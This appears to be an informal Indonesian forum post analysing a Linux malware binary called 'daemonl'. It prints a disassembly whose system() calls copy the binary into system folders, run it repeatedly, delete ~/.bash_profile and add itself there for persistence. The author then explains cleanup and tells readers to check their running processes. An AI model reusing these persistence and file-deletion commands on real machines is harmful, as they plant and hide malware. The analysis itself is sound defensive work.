.text:080483EC call _system .text:080483F1 mov [esp+10h+var_10], offset aCpBinDaemonlEt ; "cp /bin/daemonl /etc/skel/; sh -c /etc/"... .text:080483F8 call _system .text:080483FD mov [esp+10h+var_10], offset aCpBinDaemonlLi ; "cp /bin/daemonl /lib/; sh -c /lib/daemo"... .text:08048404 call _system .text:08048409 mov [esp+10h+var_10], offset aCpBinDaemonlVa ; "cp /bin/daemonl /var/run/; sh -c /var/r"... .text:08048410 call _system .text:08048415 .text:08048415 loc_8048415: ; CODE XREF: main+99 j .text:08048415 mov [esp+10h+var_10], offset aDaemonl ; "daemonl" .text:0804841C call _system .text:08048421 mov [esp+10h+var_10], offset aShCDaemonl ; "sh -c ~/daemonl" .text:08048428 call _system .text:0804842D mov [esp+10h+var_10], offset aShCLibDaemonl ; "sh -c /lib/daemonl" .text:08048434 call _system .text:08048439 mov [esp+10h+var_10], offset aShCBootDaemonl ; "sh -c /boot/daemonl" .text:08048440 call _system .text:08048445 mov [esp+10h+var_10], offset aRm_bash_profil ; "rm ~/.bash_profile" .text:0804844C call _system .text:08048451 mov [esp+10h+var_10], offset aEchoDaemonl_ba ; "echo daemonl>>~/.bash_profile" .text:08048458 call _system .text:0804845D jmp short loc_8048415 .text:0804845D main endp .text:0804845D .text:0804845D ; --------------------------------------------------------------------------- .text:0804845F align 10h .text:08048460 .text:08048460 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ saat di jalankan memang file daemonl tercopy k folder-folder tersebut & menciptakan .bash_profile tapi untungny saya tidak menggunakan bash_profile..wekzz.,.:D tinggal di hapus2 sajha...:), file daemonl nya...jgn lupa cek proses yang berjalan di mesin anda...:) saya bukan seorang virus maker...:D, maav kalo tidak bisa menjelaskan lebih jauh.,.. maksud dari heker yg kita sebut sajha bunga ini :D, membuat script seperti itu..:p no system perfect
mirror : http://ibmtech.net/yur4kh4/daemonl.txt regards : yur4kh4